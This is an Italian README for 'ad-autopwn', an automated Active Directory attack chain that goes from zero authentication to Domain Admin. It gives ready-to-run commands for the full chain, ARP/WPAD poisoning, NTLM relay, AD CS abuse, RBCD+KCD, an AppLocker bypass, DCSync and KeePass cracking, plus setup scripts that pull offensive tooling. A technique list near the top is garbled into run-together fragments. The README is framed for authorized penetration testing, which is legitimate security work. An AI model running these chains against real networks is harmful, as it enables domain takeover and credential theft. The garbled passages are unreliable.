
Catena di attacco automatizzata per Active Directory da zero-auth a Domain Admin. Combina oltre 25 tecniche tra cui Kerberoast, AD CS ESC1-16, Shadow Credentials, RBCD, DCSync e exploit di riflessione Synacktiv 2026. Solo per pentest autorizzati.
Zero-Auth a Domain Admin — Catena d'Attacco Active Directory Automatica
Uno strumento di penetration testing completamente automatizzato che combina oltre 25 tecniche d'attacco per compromettere ambienti Active Directory. Progettato per valutazioni di sicurezza autorizzate.
_ ___ _ _ ___
/_\ | \ /_\ _ _| |_ ___| _ \__ __ ___ _
/ _ \| |) | / _ \ || | _/ _ \ _/\ V V / ' \
/_/ \_\___/ /_/ \_\_,_|\__\___/_| \_/\_/|_||_|
⚡ Zero-Auth to Domain Admin — Attack Chain
Discover | Sniff | ARP | WPAD | WSUS | PXE | AD CS | SCCM | Roast
BloodHound | Reflect | Loot | RBCD+KCD | DCSync | DPAPI
DONT_REQ_PREAUTH)--spray-password).library-ms / .theme / .url su condivisioni scrivibilibloodhound-python -c All raccolta + analisi ZIPWriteSPN, AddKeyCredentialLink, GenericAll/Write, WriteDacl/Owner, WriteAccountRestrictions, AddAllowedToAct, ForceChangePasswordWriteSPN → upgrade ghost-SPN (CVE-2025-58726)AddKeyCredentialLink → shadow credentials → PKINIT → hash NTGenericAll / WriteAccountRestrictions su Computer → catena RBCD → TGS admin-altservice, in una fase-altservice$ del KDC sulla ricerca principal → TGT per utente Linux tramite account macchina <user>$ creato automaticamente → SSH GSSAPIGet-CimInstance Win32_Process tramite nxc -x; regex-grep per password in flag come mysql/sqlcmd/runas/KeePass/--password*.kdbx in C:\Users, scarica tramite smbclient, keepass2john | hashcat -m 13400# Completamente automatizzato — catena zero-credenziali (auto-scopre tutto)
sudo ./ad-autopwn.py
# Con credenziali — catena completa
./ad-autopwn.py -u jsmith -p 'P@ss123' -d corp.local --dc-ip 10.0.0.1
# Laboratori AWS / VPC (attacchi Layer 2 bloccati) — auto-scoperta ancora funziona
sudo ./ad-autopwn.py --no-arp --no-wpad
# Scoperta credenziali pre-autenticazione (sicura contro lockout)
sudo ./ad-autopwn.py --phase discover --no-arp --no-wpad
# Raccolta grafo BloodHound + analisi automatica ad alto valore
./ad-autopwn.py --phase bloodhound -u user -p pass -d corp.local \
--dc-ip 10.0.0.1 --dc-fqdn dc01.corp.local
# Dollar Ticket — TGT per 'root' tramite account macchina root$ creato automaticamente
./ad-autopwn.py -u user -p pass -d corp.local --dc-ip 10.0.0.1 \
--phase dollar-ticket --target-user root
# Catena RBCD+KCD — full ghost-SPN + RBCD + riscrittura altservice, un colpo solo
./ad-autopwn.py -u user -p pass -d corp.local --dc-ip 10.0.0.1 \
--phase rbcd-kcd -T VHAGAR$ --alt-spn HTTP/vhagar.corp.local
# Bypass AppLocker
./ad-autopwn.py -u user -p pass --applocker --lolbin mshta --custom-cmd "whoami"
# Esecuzione a secco (stampa ogni comando, non esegue nulla — nemmeno processi in background)
./ad-autopwn.py --dry-run -u user -p pass -d corp.local --dc-ip 10.0.0.1
apt install python3 impacket-scripts netexec nmap hashcat tcpdump \
responder dsniff arp-scan certipy-ad bloodyad bloodhound.py \
smbclient atftp wimtools john seclists
/opt/tools/)git clone https://github.com/mverschu/CVE-2025-33073 /opt/tools/CVE-2025-33073
git clone https://github.com/dirkjanm/krbrelayx /opt/tools/krbrelayx
git clone https://github.com/Wh04m1001/DFSCoerce /opt/tools/DFSCoerce
git clone https://github.com/ShutdownRepo/ShadowCoerce /opt/tools/ShadowCoerce
git clone https://github.com/ShutdownRepo/pywhisker /opt/tools/pywhisker
git clone https://github.com/dirkjanm/PKINITtools /opt/tools/PKINITtools
git clone https://github.com/csandker/pxethiefy /opt/tools/pxethiefy
git clone https://github.com/garrettfoster13/sccmhunter /opt/tools/sccmhunter
git clone https://github.com/dirkjanm/mitm6 /opt/tools/mitm6
git clone https://github.com/Hackndo/pyGPOAbuse /opt/tools/pyGPOAbuse
git clone https://github.com/Hackndo/WebclientServiceScanner /opt/tools/WebclientServiceScanner
git clone https://github.com/almandin/Certihound /opt/tools/Certihound
pipx install coercer
pipx install wsuks --system-site-packages
kerbrute — scarica l'ultimo binario da
https://github.com/ropnop/kerbrute/releases — installa in /usr/local/bin/userenum-cldap — enumeratore CLDAP NetLogon-ping compagno (si trova
in questo repository come userenum-cldap.py; installa in /usr/local/bin/userenum-cldap)asn1tools — pip install asn1tools (dipendenza runtime enum CLDAP)# Pacchetti APT
sudo apt install python3 impacket-scripts netexec nmap hashcat tcpdump \
responder dsniff arp-scan certipy-ad bloodyad bloodhound.py \
smbclient atftp wimtools john seclists
# Tutti i repository richiesti
for repo in mverschu/CVE-2025-33073 dirkjanm/krbrelayx \
Wh04m1001/DFSCoerce ShutdownRepo/ShadowCoerce \
ShutdownRepo/pywhisker dirkjanm/PKINITtools \
csandker/pxethiefy garrettfoster13/sccmhunter \
dirkjanm/mitm6 Hackndo/pyGPOAbuse \
Hackndo/WebclientServiceScanner almandin/Certihound; do
sudo git clone "https://github.com/$repo" "/opt/tools/$(basename $repo)"
done
# Dipendenze Python per i repository che ne hanno bisogno
for repo in pywhisker PKINITtools sccmhunter pxethiefy mitm6 pyGPOAbuse Certihound; do
[ -f "/opt/tools/$repo/requirements.txt" ] && \
pip3 install --break-system-packages -r "/opt/tools/$repo/requirements.txt"
done
# Pacchetti Pipx
pipx install coercer
pipx install wsuks --system-site-packages
# Binario kerbrute (ropnop)
sudo wget -q -O /usr/local/bin/kerbrute \
https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
sudo chmod +x /usr/local/bin/kerbrute
# Dipendenza runtime userenum CLDAP
sudo pip3 install --break-system-packages asn1tools
# Script compagno userenum-cldap (questo repository)
sudo wget -q -O /usr/local/bin/userenum-cldap \
https://raw.githubusercontent.com/jonaslejon/ad-autopwn/main/userenum-cldap.py
sudo chmod +x /usr/local/bin/userenum-cldap
# ad-autopwn stesso
sudo cp ad-autopwn.py /usr/local/bin/ad-autopwn
sudo chmod +x /usr/local/bin/ad-autopwn
check_prerequisites() viene eseguita all'inizio di ogni invocazione e stampa
uno stato verde ✅ / giallo ⚠️ per ogni strumento che lo script tocca, con
suggerimenti di installazione per eventuali elementi mancanti.
eu-west-1 — copertura completa della fase v4.10.0 verificata
end-to-end. L'auto-scoperta su AWS ora funziona letteralmente solo con
--no-arp --no-wpad (tutto il resto — interfaccia, IP attaccante,
dominio, IP DC, FQDN DC — è rilevato automaticamente tramite sweep subnet + fallback dig
a @<dc_ip>).stannis.baratheon → GenericAll → KINGSLANDING$: da una singola
credenziale a bassi privilegi a TGS admin sul DC in 5 secondi.krbtgt — golden ticket utilizzabile.--dry-run stampa ogni comando (in primo piano e in background) senza
eseguire — non avvierà ARP spoofers, mitm6, Responder o ntlmrelayx.try/finally con os.chdir
per garantire che il ripristino atterri nella directory corretta su qualsiasi percorso di uscita.--no-cleanup mantiene tutto per revisione forense.Solo per test di penetrazione autorizzati e ricerca sulla sicurezza.
Questo strumento è progettato per l'uso da parte di professionisti della sicurezza durante incarichi autorizzati. L'accesso non autorizzato ai sistemi informatici è illegale. Ottieni sempre autorizzazione scritta prima di testare.
Triop AB — https://triop.se
MIT
| Fase | Auth | Descrizione |
|---|
full | opzionale | Catena automatica completa (rileva automaticamente con o senza credenziali) |
sniff | nessuno | Scoperta passiva traffico L2 |
discover | nessuno | kerbrute + CLDAP + AS-REP + pre2k + (attivabile) spray |
arp | nessuno | ARP spoof + cattura NTLM |
wpad | nessuno | Avvelenamento WPAD/LLMNR (mitm6 / Responder) |
wsus | nessuno | NTLM relay WSUS |
pxe | nessuno | Furto credenziali boot PXE |
enum | sì | Enumerazione bersagli (target relay, delega non vincolata, host WebClient) |
enrich | sì | Batteria 13 moduli nxc (LAPS, timeroast, MAQ, nopac, zerologon, …) + consumatore automatico |
bloodhound | sì | bloodhound-python -c All + analisi + catene azioni automatiche |
roast | sì | Kerberoast + AS-REP Roast |
adcs | sì | Sfruttamento AD CS (ESC1-ESC16) |
sccm | sì | Furto credenziali NAA SCCM |
exploit | sì | Sfruttamento riflessione/coercizione NTLM su bersaglio specifico |
dcsync | sì (DA) | Dump hash dominio |
loot | sì | Raccolta cmdline processi + scoperta/cracking KeePass |
tgs-rewrite | nessuno | Riscrittura sname ccache offline (bypass KCD stile tgssub) |
dollar-ticket | sì | Attacco ripetizione suffisso $ KDC (bersaglio Linux GSSAPI) |
rbcd-kcd | sì | Orchestratore catena RBCD+KCD completa (WriteSPN → ghost → RBCD → S4U+altservice) |
reflect-tcpport | sì | Primitiva CVE-2026-24294 LPE (SMB su porta TCP) |
reflect-loopback | sì | Primitiva CVE-2026-26128 LPE (loopback Kerberos via SPN Unicode) |
kerb-reflect | sì | Riflessione CVE-2025-58726 ghost-SPN AP-REQ |